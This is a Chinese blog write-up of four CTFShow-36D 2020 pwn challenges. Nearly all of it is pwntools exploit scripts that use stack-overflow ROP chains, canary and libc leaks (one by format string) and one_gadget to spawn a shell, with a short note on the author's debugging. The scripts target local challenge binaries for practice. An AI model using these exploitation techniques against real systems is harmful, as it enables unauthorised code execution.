CTFShow-36D 2020 pwn


阅读数: 次   
字数统计: 923字   |   阅读时长: 5分

pwn0
PWN_MagicString
mengxin
tang

@TOC

pwn0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "pwn0"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
pop_rdi_addr=0x00000000004006d3
sys_addr=0x00000000004004E0
binsh_addr=0x601040    #***
# libc

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    payload=b'a'*(0x28)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(sys_addr)
    io.sendline(payload)
    io.interactive()
main()

PWN_MagicString

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "PWN_MagicString"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
pop_rdi=0x0000000000400733
ti_addr=0x60104D
binsh_addr=0x601048
magic_addr=0x000000000040062D
sys_addr=0x00000000004004F0
# libc


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    payload=b'a'*(0x2A0+8)+p64(pop_rdi)+p64(ti_addr)+p64(magic_addr)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
    io.sendline(payload)
    io.interactive()
main()

mengxin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/env python2

from pwn import *

arch = "amd64"
filename = "mengxin"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
# libc
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")

    ######leak_canary#####
    payload=b'a'*(0x40-0x18+1)
    io.send(payload)
    io.recvuntil(b'a'*(0x40-0x18))
    canary=u64(io.recv(8))-0x61
    print("canary:",hex(canary))
    gdb.attach(io, 'b printf')

    #####ret2main#####
    payload=b'a'*(0x40-0x18)+p64(canary)
    payload=payload.ljust(0x48,b'a')
    #payload+=b'\x0d'    #\x00 \x05 \x06 \x07 \x08 \x0a
    io.sendline(payload)

    #####leak_libc#####
    payload=b'a'*(0x48)
    io.send(payload)
    io.recvuntil(b'a'*(0x48))
    __libc_start_main=u64(io.recv(6).ljust(8,b'\x00'))-240#+0x36
    libcbase=__libc_start_main-libc.symbols['__libc_start_main']
    ogg_addr=libcbase+ogg_libc[0]

    print("__libc_start_main:", hex(__libc_start_main))
    print("libcbase:", hex(libcbase))
    print("ogg_addr:", hex(ogg_addr))

    ######getshell#####
    payload = b'a' * (0x40 - 0x18) + p64(canary)
    payload = payload.ljust(0x48, b'a')
    payload+=p64(ogg_addr)
    io.sendline(payload)

    io.interactive()
main()

tang

一开始其实就打算用onegadget结果第二次泄露libc的时候忘记加6(6个寄存器)(开始泄露canary就错了一遍,哭了。。),导致一直出错,回过头向注入shellcode,开始没细想,ida中看到那一段附近可执行,就加上偏移,往里写shellcode,结果还是不行,仔细一看,发现可执行段都很短,并且中间还有分隔,又回过头看onegadget,调了好长时间,才发现是printf泄露时出错了555,下次泄露出来东西一定先打印。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python2
#coding=utf-8
from pwn import *

arch = "amd64"
filename = "tang"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
# libc
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    ######leak_canary######
    io.recvuntil("你怎么了?\n")
    #gdb.attach(io, "b printf")
    io.sendline(b'%9$p')  #6+3
    canary=int(io.recv(18),16)
    print("canary:",hex(canary))
    io.recvuntil("烫烫烫烫烫烫烫烫烫烫烫烫\n")
    payload = b'aaaa'
    # payload=b'\x90'*(0xB0)+asm(shellcraft.sh())
    io.send(payload)
    ######ret2main######
    io.recvuntil("...你把手离火炉远一点!\n")
    payload=b'a'*(0x50-0x18)+p64(canary)
    payload=payload.ljust(0x58,b'\x00')
    payload+=b'\x00'
    io.send(payload)
    #######leak_libc######
    io.recvuntil("你怎么了?\n")
    io.send(b'%23$p')  # 6+17
    libc_start_main=int(io.recv(14), 16)-240
    #main_base= int(io.recv(14), 16)-2641
    #shell_addr=main_base+0x0000000000000C28
    #print("main_base:",hex(main_base))
    #print("shell_addr:",hex(shell_addr))
    #####count#####
    libcbase=libc_start_main-libc.symbols['__libc_start_main']
    print("libc_start_main:", hex(libc_start_main))
    print("libcbase:", hex(libcbase))
    ogg_addr=libcbase+ogg_libc[3]
    ###########
    io.recvuntil("烫烫烫烫烫烫烫烫烫烫烫烫\n")
    payload=b'aaaa'
    #payload=b'\x90'*(0xB0)+asm(shellcraft.sh())
    #gdb.attach(io, "b read")
    io.send(payload)
    #####getshell#####
    io.recvuntil("...你把手离火炉远一点!\n")
    payload = b'a' * (0x50 - 0x18) + p64(canary)
    payload = payload.ljust(0x58, b'\x00')
    payload += p64(ogg_addr)
    io.sendline(payload)
    io.interactive()
main()




-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791